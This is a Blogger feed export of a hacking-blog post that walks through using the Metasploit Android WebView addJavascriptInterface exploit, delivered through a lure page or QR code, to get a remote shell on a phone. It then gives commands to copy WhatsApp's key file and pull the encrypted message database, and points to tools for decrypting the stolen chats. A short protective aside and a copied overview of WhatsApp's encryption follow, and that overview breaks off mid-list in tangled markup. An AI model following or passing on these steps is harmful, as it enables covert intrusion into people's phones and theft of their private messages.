tag:blogger.com,1999:blog-1858772825834327662024-03-13T10:59:04.961+05:30Open Technation:Small Blog of Big Hack Guides And Best IT-Ebooks handpicked from InternetSmall Blog to Big Hacks and IT-Ebooks Hand Picked From Allover Internet Covering all segments of Computer ScienceAnonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.comBlogger125125tag:blogger.com,1999:blog-185877282583432766.post-27241638511785335532017-11-27T10:49:00.000+05:302018-01-26T18:33:52.282+05:30(2018 Updated)WhatsApp Database Stealing and Decrypting using kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
Required: Kali Linux with Metasploit <br />
Windows 7 or better<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieE6XpMuCle1UIdAp7sSvvpV46iYkgvHIUZaoL6aICRw89ZnFh0YKfQrhlcX_KA6czv5F4V4relLJZGKYI05ViXJgN1t6WNZM0MELoPCcTlxbr2jL73jxv_zpDfgGf77My5b_nnIfqBR1k/s1600/1280x720-s-.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieE6XpMuCle1UIdAp7sSvvpV46iYkgvHIUZaoL6aICRw89ZnFh0YKfQrhlcX_KA6czv5F4V4relLJZGKYI05ViXJgN1t6WNZM0MELoPCcTlxbr2jL73jxv_zpDfgGf77My5b_nnIfqBR1k/s320/1280x720-s-.jpg" width="320" /></a></div>
<br />
<br />
We're going to utilize here Android WebView addJavascriptInterface Vulnerability<br />
<div style="text-align: justify;">
Around 70% of all Android devices in the
field are subject to a Javascript exploit that could allow an attacker
remote access to your phone by doing nothing more than surfing to a
malicious page or scanning in a malicious QR Code.</div>
<div style="text-align: justify;">
Called the “Android WebView
addJavascriptInterface Vulnerability”, it works when untrusted
Javascript code is executed by a WebView on Android devices.</div>
<div style="text-align: justify;">
And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!</div>
<div style="text-align: justify;">
This month Rapid7 added the exploit as a <a href="http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface" target="_blank">Metasploit Module</a>, so let’s take a look at it using Kali Linux and Metasploit:</div>
<div style="text-align: justify;">
1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.</div>
<div style="text-align: justify;">
2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.</div>
<div style="text-align: justify;">
3. Then type, “show options” to see what needs to be set:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/use-exploit.png"><img alt="Use Exploit" class="alignnone size-full wp-image-5528" height="127" src="https://cyberarms.files.wordpress.com/2014/02/use-exploit.png?w=497&h=127" width="497" /></a></div>
<div style="text-align: justify;">
For the most part, you are good to go.
You can turn on SSL if you want, change the port or host address if you
want. But one variable I did change was URIPATH. By default it is
random, so I changed it to something easier to type in.</div>
<div style="text-align: justify;">
“Security” sounded reassuring.</div>
<div style="text-align: justify;">
4. Enter, “set URIPATH Security”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/set-uripath-exploit.png"><img alt="Set UriPath Exploit" class="alignnone size-full wp-image-5529" height="32" src="https://cyberarms.files.wordpress.com/2014/02/set-uripath-exploit.png?w=497&h=32" width="497" /></a></div>
<div style="text-align: justify;">
5. Finally, type “exploit”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/exploit.png"><img alt="Exploit" class="alignnone size-full wp-image-5530" src="https://cyberarms.files.wordpress.com/2014/02/exploit.png?w=497" /></a></div>
<div style="text-align: justify;">
A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.</div>
<div style="text-align: justify;">
Now if a vulnerable Android device surfs to our Metasploit module, sitting at <i><b>192.168.1.16:8080/Security</b> </i>in this demo, you get a remote session:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/session-created.png"><img alt="Session created" class="alignnone size-full wp-image-5531" height="60" src="https://cyberarms.files.wordpress.com/2014/02/session-created.png?w=497&h=60" width="497" /></a></div>
<div style="text-align: justify;">
Now just connect to the session using “sessions -i 1”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/interacting-with-session.png"><img alt="Interacting with session" class="alignnone size-full wp-image-5532" height="36" src="https://cyberarms.files.wordpress.com/2014/02/interacting-with-session.png?w=497&h=36" width="497" /></a></div>
<div style="text-align: justify;">
And that is it! You are connected to the Android device.</div>
<div style="text-align: justify;">
But on one Android Tablet that I tested,
something didn’t seem right. It allowed me to run some Linux commands
but not others. I could use “pwd” to see the current directory that I
was in, and I could surf to other directories with “cd”, but the “ls”
and other commands would not work:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/ls-not-found.png"><img alt="LS not found" class="alignnone size-full wp-image-5533" src="https://cyberarms.files.wordpress.com/2014/02/ls-not-found.png?w=497" /></a></div>
<div style="text-align: justify;">
Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.</div>
<div style="text-align: justify;">
A quick check of the path with “echo path” revealed that no path was set:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/echo-path.png"><img alt="Echo Path" class="alignnone size-full wp-image-5534" src="https://cyberarms.files.wordpress.com/2014/02/echo-path.png?w=497" /></a></div>
<div style="text-align: justify;">
So I set it by typing, “export PATH=/system/bin:$PATH”:</div>
<div style="text-align: justify;">
Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/export-path.png"><img alt="export path" class="alignnone size-full wp-image-5535" src="https://cyberarms.files.wordpress.com/2014/02/export-path.png?w=497" /></a></div>
<div style="text-align: justify;">
As you can see, I had a complete remote shell to the Android device.</div>
<div style="text-align: justify;">
All I had to do was visit a malicious
page using the built in Browser and the exploit ran with no further
warning or input from the Android device. To make matters worse, the URL
could be printed as a QR Code so that once it is scanned, it
automatically goes to the malicious page for true “click and pwn”.</div>
<div style="text-align: justify;">
So what can you do to protect yourself against this type of attack?</div>
<div style="text-align: justify;">
The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…</div>
<div style="text-align: justify;">
Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.</div>
<div style="text-align: justify;">
Also, never scan in QR Codes from unknown sources.</div>
<div style="text-align: justify;">
But I did notice that one device I tested
wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I
remembered that the Android Browser did have an update that I downloaded
before testing.</div>
<div style="text-align: justify;">
Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.</div>
<div style="text-align: justify;">
As you can we have Root access to Android Device so you have to collect the key file in order to decrypt the WhatsApp Database so for that browse to<b> <span class="file">/data/data/com.whatsapp/files/key </span></b><span class="file">so to do this use this command : </span><b><span class="file"><br /></span></b></div>
<pre class="prettyprint lang-sh"><b><span style="color: #cc0000;">cp /data/data/com.whatsapp/files/key /sdcard</span> </b></pre>
<pre class="prettyprint lang-sh"><b>now as you have key file you will have to steal the database file with command:</b></pre>
<pre class="prettyprint lang-sh"><span style="color: red;"><b> </b>
<b> pull /sdcard/WhatsApp/Databases/msgstore.db.crypt8</b></span></pre>
<pre class="prettyprint lang-sh"><b>as you have the key file and the database now your work is almost complete swithover to Windows Engine and Download </b></pre>
<pre class="prettyprint lang-sh"><b>this Tool <a href="http://andreas-mausch.github.io/whatsapp-viewer/" target="_blank">WhatsApp Viewer</a> </b></pre>
<pre class="prettyprint lang-sh"><b>Once you download this give your stolen Crypt8 Database File and key file then you can view the messages</b></pre>
<pre class="prettyprint lang-sh"><b>even the images still if you don't want to download it when go to this website </b><a href="http://whatcrypt.com/?cmd=_cryptkey#.VoS0l0_K7IU" target="_blank">http://whatcrypt.com/</a> and upload your key file </pre>
<pre class="prettyprint lang-sh">and Database so once it's decrypted you cn download it as Simple HTML.</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8aICh3-DmSjM7SYJYKHyVbmg0H_saUBCDGcpTDZnojar6HIoJFEsyElOqipRjJwatkG99gesCe__T609rkkCxrQfzxG-xhiyUI2oUgqesRbDVYYibkqLgPUSWtyEkR_kTJVKc55Uzru_/s1600/shot-20151231-1874-j0e126.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8aICh3-DmSjM7SYJYKHyVbmg0H_saUBCDGcpTDZnojar6HIoJFEsyElOqipRjJwatkG99gesCe__T609rkkCxrQfzxG-xhiyUI2oUgqesRbDVYYibkqLgPUSWtyEkR_kTJVKc55Uzru_/s320/shot-20151231-1874-j0e126.jpeg" width="190" /></a></div>
<pre class="prettyprint lang-sh"> </pre>
<pre class="prettyprint lang-sh"><b> </b></pre>
<pre class="prettyprint lang-sh"><b> </b></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
More About WhatsApp Database and How to Hack WhatsApp using Kali Linux<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">This provides a technical explanation of WhatsApp’s<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">end-to-end encryption system .<span style="color: #59595c; font-style: normal; font-variant: normal;"><br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp Messenger allows people to exchange messages (including<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chats, group chats, images, videos, voice messages and files) and make<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp calls around the world . WhatsApp messages and calls between<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a sender and receiver that use WhatsApp client software released after<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">March 31, 2016 are end-to-end encrypted .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The Signal protocol, designed by Open Whisper Systems, is the basis for<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp’s end-to-end encryption . This end-to-end encryption protocol<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is designed to prevent third parties and WhatsApp from having plaintext<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">access to messages or calls. What’s more, even if encryption keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from a user’s device are ever physically compromised, they cannot be<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">used to go back in time to decrypt previously transmitted messages.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This document gives an overview of the Signal protocol and its use in<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"> <span style="color: #39bca8; font-style: normal; font-variant: normal;">Public Key Types<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key Pair <span style="color: #59595c; font-style: normal; font-variant: normal;">– A long-term Curve25519 key pair,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">generated at install time .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A medium-term Curve25519 key pair,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">generated at install time, signed by the <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and rotated<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">on a periodic timed basis .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">– A queue of Curve25519 key pairs for one<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">time use, generated at install time, and replenished as needed .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Session Key Types<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A 32-byte value that is used to create <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A 32-byte value that is used to create <span style="color: #59595c; font-style: normal; font-variant: normal;">Message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Keys<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– An 80-byte value that is used to encrypt message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">contents. 32 bytes are used for an AES-256 key, 32 bytes for a<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 key, and 16 bytes for an IV.</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;">Client Registration<br /><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">At registration time, a WhatsApp client transmits its public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, public <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">(with its signature), and a batch of public<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">to the server . The WhatsApp server stores these<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public keys associated with the user’s identifier. At no time does the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp server have access to any of the client’s private keys.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Initiating Session Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">To communicate with another WhatsApp user, a WhatsApp client<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">first needs to establish an encrypted session. Once the session<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is established, clients do not need to rebuild a new session with<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">each other until the existing session state is lost through an<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">external event such as an app reinstall or device change .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">To establish a session:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The initiating client (“initiator”) requests the public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key<span style="color: #59595c; font-style: normal; font-variant: normal;">,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and a single public <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">for the recipient .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The server returns the requested public key values. A <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is only used once, so it is removed from server storage<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">after being requested . If the recipient’s latest batch of <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">has been consumed and the recipient has not replenished<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">them, no <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">will be returned .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator saves the recipient’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">, the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">, and the <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">O<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The initiator generates an ephemeral Curve25519 key pair, <span style="color: #59595c; font-style: normal; font-variant: normal;">E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . The initiator loads its own <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">6 . The initiator calculates a master secret as <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) || ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, I<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) ||<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) || ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, O<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">If there is no <span style="color: #59595c; font-style: normal; font-variant: normal;">One Time Pre Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, the final ECDH is omitted.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">7 . The initiator uses HKDF to create a <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;">s<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Receiving Session Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">After
building a long-running encryption session, the initiator can
immediately start sending messages to the recipient, even if the
recipient is offline.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Until the recipient responds, the initiator includes the information (in the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">header of all messages sent) that the recipient requires to build a corresponding session . This includes the initiator’s <span style="color: #59595c; font-style: normal; font-variant: normal;">E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">When the recipient receives a message that includes session setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">information:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The recipient calculates the corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret <span style="color: #59595c; font-style: normal; font-variant: normal;">using<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">its own private keys and the public keys advertised in the header of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the incoming message .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The recipient deletes the <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used by the initiator .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator uses HKDF to derive a corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Exchanging Messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Once a session has been established, clients exchange messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">that are protected with a <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">using <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">in CBC<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">mode for encryption and <span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 <span style="color: #59595c; font-style: normal; font-variant: normal;">for authentication .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">changes for each message transmitted, and is ephemeral, such that the <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used to<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">encrypt a message cannot be reconstructed from the session<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">state after a message has been transmitted or received .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is derived from a sender’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">that<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">“ratchets” forward with every message sent. Additionally, a new ECDH<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">agreement is performed with each message roundtrip to create a new<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> . This provides forward secrecy through the combination<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">of both an immediate “hash ratchet” and a round trip “DH ratchet.”<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Message Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is needed by a<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">message sender, it is calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key = HMAC-SHA256(Chain Key, 0x01)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is then updated as <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256(Chain Key, 0x02)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This causes the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">to “ratchet” forward, and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">also means that a stored <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">can’t be used to<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">derive current or past values of the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Root Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a message is transmitted, an ephemeral <span style="color: #59595c; font-style: normal; font-variant: normal;">Curve25519<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public key is advertised along with it. Once a response is received,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">are calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">ephemeral_secret =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">sender<span style="color: #59595c; font-style: normal; font-variant: normal;">, Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> <span style="color: #59595c; font-style: normal; font-variant: normal;">2 . <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key, Root Key =<span style="color: #59595c; font-style: normal; font-variant: normal;"> HKDF(Root Key, ephemeral_secret)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">A chain is only ever used to send messages from one user, so<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">message keys are not reused. Because of the way <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">are calculated, messages can arrive delayed,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">out of order, or can be lost entirely without any problems .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transmitting Media and Other<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Attachments<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">large attachments of any type (video, audio, images,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">or files) are also end-to-end encrypted:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The WhatsApp user sending a message (“sender”) generates an<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ephemeral 32 byte <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key, and an ephemeral 32 byte <span style="color: #59595c; font-style: normal; font-variant: normal;">HMACSHA256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key.<br /><span 